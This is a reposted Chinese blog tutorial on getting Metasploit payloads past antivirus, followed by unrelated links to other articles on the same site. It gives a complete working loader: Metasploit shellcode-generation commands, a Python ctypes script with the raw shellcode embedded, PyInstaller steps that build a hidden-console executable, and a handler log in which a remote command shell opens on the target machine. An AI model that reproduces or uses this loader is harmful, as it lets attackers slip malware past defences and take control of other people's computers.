Metasploit - Tips for Evading Anti-Virus

2024-05-31 02:08

本文主要是介绍Metasploit - Tips for Evading Anti-Virus,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

绕过杀毒软件,有许多钟方法。此处介绍一种,编写python程序调用shellcode,并使用Pyinstalerpython程序编译为exe程序。


准备工作:(Windows XP环境下编译)

Python程序编译为exe,需要Python主程序,pywin32库,Pyinstaller(直接解压到C)。如果编译过程中出现错误提示,请按照指示解决问题。安装过程不是很复杂,在此不予说明。

https://www.python.org/ftp/python/2.7.8/python-2.7.8.msi
http://softlayer-dal.dl.sourceforge.net/project/pywin32/pywin32/Build%20219/pywin32-219.win32-py2.7.exe
https://pypi.python.org/packages/source/P/PyInstaller/PyInstaller-2.1.tar.gz


利用metasploit生成shellcode,供后面的python程序使用。

msf payload(shell_bind_tcp) > show options  
 
Module options (payload/windows/shell_bind_tcp):
 
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  seh              yes       Exit technique (accepted: seh, thread, process, none)
   LPORT     4444             yes       The listen port
   RHOST     0.0.0.0          no        The target address
 
msf payload(shell_bind_tcp) > generate -b '\x00' -f /home/nixawk/bind_tcp.txt -p windows -t c
[*] Writing 1803 bytes to /home/nixawk/bind_tcp.txt...


准备完成后,python程序源码如下:

from ctypes import *

shellcode = '\xfc\xe8\x86\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x8b\x4c\x10\x78\xe3\x4a\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x89\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x05\x68\xc0\xa8\x01\x6b\x68\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec\x68\xf0\xb5\xa2\x56\xff\xd5\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x01\xc3\x29\xc6\x85\xf6\x75\xec\xc3'

memorywithshell = create_string_buffer(shellcode, len(shellcode))
shell = cast(memorywithshell, CFUNCTYPE(c_void_p))
shell()


利用Pyinstaller编译上述包含shellcodepython文件,命令如下:


C:\PyInstaller-2.1\utils>pythonmakespec.py --onefile --noconsole shellcode.py

wrote C:\PyInstaller-2.1\utils\shellcode.spec
now run pyinstaller.py to build the executable

C:\PyInstaller-2.1\utils>pythonbuild.py shellcode.spec

59 INFO: Testing for ability to set icons, version resources...
69 INFO: ... resource update available
79 INFO: UPX is not available.
109 INFO: Processing hook hook-os
259 INFO: Processing hook hook-time
259 INFO: Processing hook hook-cPickle
349 INFO: Processing hook hook-_sre
509 INFO: Processing hook hook-cStringIO
639 INFO: Processing hook hook-encodings
660 INFO: Processing hook hook-codecs
1171 INFO: Extending PYTHONPATH with C:\PyInstaller-2.1\utils
1171 INFO: checking Analysis
1171 INFO: building Analysis because out00-Analysis.toc non existent
1171 INFO: running Analysis out00-Analysis.toc
1171 INFO: Adding Microsoft.VC90.CRT to dependent assemblies of final executable
1171 INFO: Searching for assembly x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_x-ww ...
1171 WARNING: Assembly not found
1180 ERROR: Assembly x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_x-ww not found
1220 WARNING: lib not found: MSVCR90.dll dependency of C:\Python27\python.exe
1230 INFO: Searching for assembly x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_x-ww ...
1230 WARNING: Assembly not found
1230 ERROR: Assembly x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_x-ww not found
1351 WARNING: lib not found: MSVCR90.dll dependency of C:\WINDOWS\system32\python27.dll
1351 INFO: Analyzing C:\PyInstaller-2.1\PyInstaller\loader\_pyi_bootstrap.py
1381 INFO: Processing hook hook-os
1401 INFO: Processing hook hook-site
1421 INFO: Processing hook hook-encodings
1562 INFO: Processing hook hook-time
1562 INFO: Processing hook hook-cPickle
1661 INFO: Processing hook hook-_sre
1822 INFO: Processing hook hook-cStringIO
1961 INFO: Processing hook hook-codecs
2463 INFO: Processing hook hook-pydoc
2632 INFO: Processing hook hook-email
2713 INFO: Processing hook hook-httplib
2763 INFO: Processing hook hook-email.message
2844 INFO: Analyzing C:\PyInstaller-2.1\PyInstaller\loader\pyi_importers.py
2904 INFO: Analyzing C:\PyInstaller-2.1\PyInstaller\loader\pyi_archive.py
2963 INFO: Analyzing C:\PyInstaller-2.1\PyInstaller\loader\pyi_carchive.py
3043 INFO: Analyzing C:\PyInstaller-2.1\PyInstaller\loader\pyi_os_path.py
3043 INFO: Analyzing shellcode.py
3114 INFO: Hidden import 'codecs' has been found otherwise
3114 INFO: Hidden import 'encodings' has been found otherwise
3114 INFO: Looking for run-time hooks
3154 WARNING: lib not found: MSVCR90.dll dependency of C:\Python27\DLLs\select.pyd
3203 WARNING: lib not found: MSVCR90.dll dependency of C:\Python27\DLLs\unicodedata.pyd
3273 WARNING: lib not found: MSVCR90.dll dependency of C:\Python27\DLLs\_hashlib.pyd
3323 WARNING: lib not found: MSVCR90.dll dependency of C:\Python27\DLLs\bz2.pyd
3414 WARNING: lib not found: MSVCR90.dll dependency of C:\Python27\DLLs\_ssl.pyd
3484 WARNING: lib not found: MSVCR90.dll dependency of C:\Python27\DLLs\_ctypes.pyd
3555 WARNING: lib not found: MSVCR90.dll dependency of C:\Python27\DLLs\_socket.pyd
3575 INFO: Using Python library C:\WINDOWS\system32\python27.dll
3625 INFO: Warnings written to C:\PyInstaller-2.1\utils\build\shellcode\warnshellcode.txt
3634 INFO: checking PYZ
3634 INFO: rebuilding out00-PYZ.toc because out00-PYZ.pyz is missing
3634 INFO: building PYZ (ZlibArchive) out00-PYZ.toc
4815 INFO: checking PKG
4815 INFO: rebuilding out00-PKG.toc because out00-PKG.pkg is missing
4815 INFO: building PKG (CArchive) out00-PKG.pkg
6167 INFO: checking EXE
6167 INFO: rebuilding out00-EXE.toc because shellcode.exe missing
6167 INFO: building EXE from out00-EXE.toc
6167 INFO: Appending archive to EXE C:\PyInstaller-2.1\utils\dist\shellcode.exe

编译完成后,将shellcode.exe放到目标主机上执行,成功获取反弹shell

msf exploit(handler) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf exploit(handler) > show options  
 
Module options (exploit/multi/handler):
 
   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------
 
 
Payload options (windows/shell/reverse_tcp):
 
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (accepted: seh, thread, process, none)
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port
 
 
Exploit target:
 
   Id  Name
   --  ----
   0   Wildcard Target
 
 
msf exploit(handler) > set LHOST 192.168.1.107
LHOST => 192.168.1.107
msf exploit(handler) > run
 
[*] Started reverse handler on 192.168.1.107:4444  
[*] Starting the payload handler...
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 192.168.1.112
[*] Command shell session 1 opened (192.168.1.107:4444 -> 192.168.1.112:2061) at 2014-08-28 12:51:54 +0800
 
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
 
C:\PyInstaller-2.1\utils> 


参考链接:
http://pen-testing.sans.org/blog/pen-testing/2011/10/13/tips-for-evading-anti-virus-during-pen-testing
https://community.rapid7.com/community/metasploit/blog/2014/03/26/new-metasploit-49-helps-evade-anti-virus-solutions-test-network-segmentation-and-increase-productivity-for-penetration-testers
http://www.scriptjunkie.us/2011/04/why-encoding-does-not-matter-and-how-metasploit-generates-exes/
http://schierlm.users.sourceforge.net/avevasion.html
http://www.pentestgeek.com/2012/01/25/using-metasm-to-avoid-antivirus-detection-ghost-writing-asm/

这篇关于Metasploit - Tips for Evading Anti-Virus的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/1017235

相关文章

Unity协程搭配队列开发Tips弹窗模块

概述 在Unity游戏开发过程中,提示系统是提升用户体验的重要组成部分。一个设计良好的提示窗口不仅能及时传达信息给玩家,还应当做到不干扰游戏流程。本文将探讨如何使用Unity的协程(Coroutine)配合队列(Queue)数据结构来构建一个高效且可扩展的Tips弹窗模块。 技术模块介绍 1. Unity协程(Coroutines) 协程是Unity中的一种特殊函数类型,允许异步操作的实现

Anti-alias的前世今生

原文: http://www.cnblogs.com/gongminmin/archive/2011/05/16/2047506.html Anti-alias,简称AA,在图形学中广泛地用于提升渲染质量。经过几十年的发展,AA也从离线渲染逐步普及到了实时渲染的领域。本系列文章将总结一下在实时渲染中使用的AA方法的前世和今生。本片集中讨论硬件提供的AA方法。 图1. 一个像素内部的采样

解决Metasploit调用Nessus报错问题

问题描述 Error while running command nessus_scan_new: undefined method `[]’ for nil:NilClass 解决方法 发现报错,经过网上查询解决方法 在Nessus服务器执行,下面的版本号可能有所不同,根据自己的情况更改,需要管理员身份执行。 curl "https://raw.githubuserconte

API安全 | 发现API的5个小tips

在安全测试目标时,最有趣的测试部分是它的 API。API 是动态的,它们比应用程序的其他部分更新得更频繁,并且负责许多后端繁重的工作。在现代应用程序中,我们通常会看到 REST API,但也会看到其他形式,例如 GraphQL 甚至 SOAP。 当我们第一次对某个目标进行安全测试时,我们需要做大量研究,以了解其主要功能以及它们在幕后如何工作。建议花一些时间来阅读有关目标及其服务的信息。例如,如果

Anylogic制作界面元素tips

点击元素后跳转至其他视图,且能够把某个共同元素移植过去 navigate( viewStatistics2 );groupControls.setX( groupControls.getX() + 1200 );

deep learning tips

dropout是为了防止过拟合,实在testing data上面效果不好时用的,而training data效果不好的时候不会考虑这个方法。 vanishing gradient problem和 exploding gradient:梯度消失和梯度爆炸问题,可以参考此篇博客。 Regularization: L2: 不考虑bias是因为我们加入正则是为了让我们的function更平滑

清除系统缓存提高写盘速度的tips

sync; echo 3 > /proc/sys/vm/drop_caches 上面是一个常用于 Linux 系统的命令组合,主要用于清理内存中的缓存。下面是对这条命令的详细解释: sync sync 命令用于将所有未写入磁盘的缓存数据写入磁盘。Linux 操作系统会将一些数据保存在内存中(例如文件系统的缓冲区),以提高性能。执行 sync 命令后,系统会将所有这些缓存数据写入磁盘,从

Git_Tips

文章目录 Git安装Github新增ssh强制覆盖本地删除Git凭据常用操作分支操作远程操作日志操作标签操作Tips克隆某分支强制推送分支到master跟踪空文件夹推送多个仓库分支迁移GitHub Q&AThe authenticity of host 'github.com (192.30.255.112)' can't be establishederror:failed to push

CentOS_Tips

文章目录 系统安装下载镜像制作启动盘安装分区介绍 常见操作关闭selinux密码重置网络配置更换阿里云镜像 常用软件FTP其它oh-my-zsh 系统安装 下载镜像 阿里云镜像站 制作启动盘 下载使用Rufus,制作镜像 安装 SOFTWARE SELECTION Minimal Install(最小化安装)右侧:调试工具、兼容库、开发者工具、系统管理工具

Spring_Tips

文章目录 Lettuce和Jedis 对比 Lettuce和Jedis 对比 Lettuce 和 jedis 的都是连接 Redis Server的客户端,Jedis 在实现上是直连 redis server,多线程环境下非线程安全,除非使用连接池,为每个 redis实例增加 物理连接。Lettuce 是 一种可伸缩,线程安全,完全非阻塞的Redis客户端,多个线程可以共享一个